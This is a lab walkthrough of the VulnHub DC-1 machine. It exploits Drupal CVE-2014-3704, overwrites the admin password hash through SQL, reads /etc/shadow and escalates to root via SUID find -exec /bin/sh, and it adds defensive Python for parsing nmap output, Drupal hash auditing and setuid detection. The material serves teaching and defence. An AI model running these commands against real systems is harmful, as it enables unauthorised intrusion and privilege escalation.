Download: https://download.vulnhub.com/dc/DC-1.zip
nmap -A -T4 10.10.10.132 --script=vuln
Nmap scan report for 10.10.10.132
Host is up (0.00034s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4 deb7u7 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.132
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.132:80/
| Form id: user-login-form
| Form action: /node?destination=node
|
| Path: http://10.10.10.132:80/user/register
| Form id: user-register-form
| Form action: /user/register
|
| Path: http://10.10.10.132:80/node?destination=node
| Form id: user-login-form
| Form action: /node?destination=node
|
| Path: http://10.10.10.132:80/user/password
| Form id: user-pass
| Form action: /user/password
|
| Path: http://10.10.10.132:80/user
| Form id: user-login
| Form action: /user
|
| Path: http://10.10.10.132:80/user/
| Form id: user-login
|_ Form action: /user/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /rss.xml: RSS or Atom feed
| /robots.txt: Robots file
| /UPGRADE.txt: Drupal file
| /INSTALL.txt: Drupal file
| /INSTALL.mysql.txt: Drupal file
| /INSTALL.pgsql.txt: Drupal file
| /: Drupal version 7
| /README: Interesting, a readme.
| /README.txt: Interesting, a readme.
| /0/: Potentially interesting folder
|_ /user/: Potentially interesting folder
|_http-server-header: Apache/2.2.22 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2014-3704:
| VULNERABLE:
| Drupal - pre Auth SQL Injection Vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-3704
| The expandArguments function in the database abstraction API in
| Drupal core 7.x before 7.32 does not properly construct prepared
| statements, which allows remote attackers to conduct SQL injection
| attacks via an array containing crafted keys.
|
| Disclosure date: 2014-10-15
| References:
| https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
| http://www.securityfocus.com/bid/70595
| https://www.drupal.org/SA-CORE-2014-005
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
111/tcp open rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 36912/udp status
| 100024 1 37215/tcp6 status
| 100024 1 52947/udp6 status
|_ 100024 1 54937/tcp status
MAC Address: 00:0C:29:3D:43:A8 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.34 ms 10.10.10.132
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 530.45 seconds
The scan output shows the host is affected by CVE-2014-3704.
Search for it with searchsploit; the -m parameter copies the exploit into the current directory.
Then search for it in Metasploit (msf).
Exploit the vulnerability to get a shell.
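Reading a long "vuln" script report by eye is error-prone, so here is an added example (not part of the walkthrough) that parses Nmap's normal-format output into ports and per-port script results, then pulls out every script that reported "State: VULNERABLE" together with the CVE ids it cites. The sample input is a trimmed copy of the scan above; the regular expressions assume the script names are lowercase (as Nmap's are) and that the leading indentation was lost, exactly as in the pasted output.

```python
import re

# Constructed sample: a trimmed copy of the scan output shown above.
SAMPLE_REPORT = """\
Nmap scan report for 10.10.10.132
Host is up (0.00034s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4 deb7u7 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
| http-vuln-cve2014-3704:
| VULNERABLE:
| Drupal - pre Auth SQL Injection Vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-3704
| References:
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
|_ 100000 2,3,4 111/tcp rpcbind
"""

HOST_RE = re.compile(r'^Nmap scan report for (\S+)')
PORT_RE = re.compile(r'^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$')
# Script names are lowercase with digits/hyphens; inner lines such as
# "State:" or "IDs:" start with an uppercase letter and so never match.
SCRIPT_RE = re.compile(r'^\|_?\s*([a-z][a-z0-9-]*):\s*(.*)$')
CVE_RE = re.compile(r'CVE-\d{4}-\d{4,}')


def parse_nmap(text):
    """Turn Nmap normal output into {'host': str, 'ports': [port dicts]}.

    Each port dict carries the NSE script output that followed it, keyed by
    script name, as a list of stripped lines.
    """
    report = {'host': None, 'ports': []}
    port = script = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            report['host'] = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m:
            port = {'port': int(m.group(1)), 'proto': m.group(2),
                    'state': m.group(3), 'service': m.group(4),
                    'version': m.group(5).strip(), 'scripts': {}}
            report['ports'].append(port)
            script = None
            continue
        if port is None or not line.startswith('|'):
            continue  # script lines only make sense under a port
        m = SCRIPT_RE.match(line)
        if m:
            script = m.group(1)
            port['scripts'][script] = [m.group(2)] if m.group(2) else []
            continue
        if script is not None:
            port['scripts'][script].append(line.lstrip('|_ ').rstrip())
    return report


def vulnerable_findings(report):
    """Scripts that reported State: VULNERABLE, with the CVE ids they mention."""
    findings = []
    for port in report['ports']:
        for name, lines in port['scripts'].items():
            if any(l.startswith('State: VULNERABLE') for l in lines):
                cves = sorted({c for l in lines for c in CVE_RE.findall(l)})
                findings.append({'port': port['port'], 'script': name,
                                 'cves': cves})
    return findings


if __name__ == '__main__':
    rep = parse_nmap(SAMPLE_REPORT)
    for f in vulnerable_findings(rep):
        print(f"{rep['host']}:{f['port']} {f['script']} {', '.join(f['cves'])}")
```

Fed a full `nmap -oN` file for a fleet of hosts, the same two functions give a ticketable list of (host, port, script, CVE) tuples, which is the defender's starting point for patching Drupal below 7.32.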
Switch to a shell:
cat flag1.txt
Every good CMS needs a config file - and so do you.
Found flag1.
Now look for the Drupal configuration file.
By default the Drupal database configuration lives in
/sites/default/settings.php
Found flag2.
cat settings.php
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
Use python to spawn an interactive shell and check the current privileges:
python -c '__import__("pty").spawn("/bin/bash")'
We are running as the www user.
Looking at the database,
the password hashes are salted, so cracking them is fairly hard; instead we can update the password directly, or use another method.
Approach:
update users set pass='$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4' where name='admin';
Then log in using password as the password.
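To make concrete why the walkthrough calls these hashes hard to crack, here is an added example (not part of the walkthrough or of Drupal's own code) that reimplements the Drupal 7 `$S$` password scheme from password.inc in Python: a 4th character encoding log2 of the iteration count, an 8-character salt, then SHA-512 iterated 2^log2 times over digest+password, encoded with the phpass alphabet and truncated to 55 characters. Besides verifying a password against a stored hash, it exposes the iteration cost of each hash so an administrator can audit a users table for hashes generated with a lower cost than the site's configured default. The constant names mirror Drupal's defines; PAGE_HASH is the hash from the UPDATE statement above.

```python
"""Drupal 7 password hash ($S$ prefix) reimplemented from password.inc.

Added example, not Drupal's own code. Layout of a stored hash:
  $S$  C       DbdwZvjH   Q09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4
  tag  log2    8-char     SHA-512 iterated 2**log2 times over digest+pw,
       rounds  salt       phpass base64, whole string cut to 55 chars
"""
import hashlib
import hmac
import os

ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
HASH_LENGTH = 55            # DRUPAL_HASH_LENGTH
MIN_LOG2, MAX_LOG2 = 7, 30  # DRUPAL_MIN_HASH_COUNT / DRUPAL_MAX_HASH_COUNT
DEFAULT_LOG2 = 15           # DRUPAL_HASH_COUNT in Drupal 7

# The hash written into the users table in the walkthrough above.
PAGE_HASH = '$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4'


def _b64(data):
    """phpass-style base64: 6-bit groups, little-endian, ITOA64 alphabet."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return ''.join(out)


def parse_setting(stored):
    """Return (count_log2, salt) from a $S$ hash; ValueError if malformed."""
    if len(stored) < 12 or stored[:3] != '$S$':
        raise ValueError('not a Drupal 7 $S$ hash')
    count_log2 = ITOA64.find(stored[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        raise ValueError('iteration count outside Drupal bounds')
    return count_log2, stored[4:12]


def iteration_count(stored):
    """Number of SHA-512 rounds an attacker must pay per guess for this hash."""
    return 1 << parse_setting(stored)[0]


def crypt_sha512(password, setting):
    """Drupal's _password_crypt('sha512', ...) for a given 12-char setting."""
    pw = password.encode('utf-8')
    if len(pw) > 512:
        raise ValueError('password too long')
    count_log2, salt = parse_setting(setting)
    digest = hashlib.sha512(salt.encode('ascii') + pw).digest()
    for _ in range(1 << count_log2):  # the do/while in password.inc
        digest = hashlib.sha512(digest + pw).digest()
    return (setting[:12] + _b64(digest))[:HASH_LENGTH]


def hash_password(password, count_log2=DEFAULT_LOG2):
    """Fresh random salt (6 bytes -> 8 chars), like user_hash_password()."""
    setting = '$S$' + ITOA64[count_log2] + _b64(os.urandom(6))
    return crypt_sha512(password, setting)


def check_password(password, stored):
    """Constant-time comparison, like user_check_password()."""
    try:
        return hmac.compare_digest(crypt_sha512(password, stored), stored)
    except ValueError:
        return False


def weak_cost(hashes, min_log2=DEFAULT_LOG2):
    """Audit helper: hashes whose iteration exponent is below min_log2."""
    return [h for h in hashes if parse_setting(h)[0] < min_log2]


if __name__ == '__main__':
    print('rounds for PAGE_HASH:', iteration_count(PAGE_HASH))
    # The walkthrough states this hash corresponds to "password"; verify it.
    print('matches "password":', check_password('password', PAGE_HASH))
```

The salt defeats precomputed tables and the 2^14 rounds of SHA-512 per guess (here; Drupal 7's default is 2^15) make every candidate expensive, which is the "hard to crack" the walkthrough refers to. The weak_cost helper is the useful defensive by-product: hashes created under an old or lowered password_count_log2 setting stay in the users table until the account's next login, so an audit should look for exponents below the configured value.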
Earlier, searchsploit also showed a script that adds an account with administrator privileges.
Copy that script into the current directory.
This is another way to get administrator access:
it directly creates an account with admin privileges.
Got the third flag.
Check the hints:
whoami
uname -a
cat /etc/passwd
cat /etc/shadow
flag4 is in the home directory.
It tells you that you need root access.
Next, privilege escalation.
flag3 hinted at using find -exec.
Search for programs with the SUID bit set:
find / -user root -perm -4000 -print 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
find has the SUID bit set, so it runs with root privileges.
Then use find … -exec "…" \; to run a command on the matched files:
find ./ -exec "whoami" \;
find ./ -exec "/bin/sh" \;
Successfully escalated to root.
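The root cause on DC-1 is a setuid-root copy of find, which no stock Debian package ships that way. As an added example (not from the walkthrough), the following Python audit walks a filesystem tree for setuid regular files, compares their names against an allow-list of binaries that legitimately need the bit, and clears the bit on anything unexpected; it builds its own throwaway directory tree to demonstrate on, so it runs without root. The allow-list is constructed for illustration; a real baseline should come from the installed packages' manifests, and a real run passes owner_uid=0 to mirror the -user root filter above.

```python
import os
import stat
import tempfile

# Constructed allow-list of programs that legitimately carry setuid-root on a
# typical Debian host. A real baseline should be derived from the package
# manifests of the installed system, not hard-coded like this.
SUID_ALLOWLIST = frozenset({
    'passwd', 'su', 'sudo', 'mount', 'umount', 'ping', 'chsh', 'chfn',
    'gpasswd', 'newgrp',
})


def list_suid(root, owner_uid=None):
    """Paths (relative to root) of regular files with the setuid bit set.

    owner_uid=0 reproduces the walkthrough's `-user root` filter; None keeps
    files of any owner, which the demo tree below needs as it is not root-owned.
    """
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat so symlinks are never followed
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_ISUID:
                continue
            if owner_uid is not None and st.st_uid != owner_uid:
                continue
            found.append(os.path.relpath(path, root))
    return sorted(found)


def unexpected_suid(root, allowlist=SUID_ALLOWLIST, owner_uid=None):
    """Setuid files whose basename is not on the allow-list (find, vim, ...)."""
    return [p for p in list_suid(root, owner_uid)
            if os.path.basename(p) not in allowlist]


def strip_suid(root, relpath):
    """Remediation: clear the setuid bit (same effect as `chmod u-s`)."""
    path = os.path.join(root, relpath)
    mode = stat.S_IMODE(os.lstat(path).st_mode)
    os.chmod(path, mode & ~stat.S_ISUID)
    return not (os.lstat(path).st_mode & stat.S_ISUID)


def make_demo_tree():
    """Constructed fixture mirroring the DC-1 finding: setuid on passwd
    (expected) and on find (not expected); ls carries no setuid bit."""
    base = tempfile.mkdtemp(prefix='suid-audit-')
    bindir = os.path.join(base, 'usr', 'bin')
    os.makedirs(bindir)
    for name, mode in (('passwd', 0o4755), ('find', 0o4755), ('ls', 0o755)):
        path = os.path.join(bindir, name)
        with open(path, 'w') as fh:
            fh.write('#!/bin/sh\n')
        os.chmod(path, mode)
    return base


if __name__ == '__main__':
    demo = make_demo_tree()
    print('setuid files   :', list_suid(demo))
    print('not on allowlist:', unexpected_suid(demo))
```

Run against "/" with owner_uid=0 on a schedule (or as a check in a configuration-management pipeline), this turns the enumeration step of the walkthrough into a detection: any setuid-root program outside the baseline is a finding, and strip_suid is the one-line fix for a binary such as find that should never have had the bit.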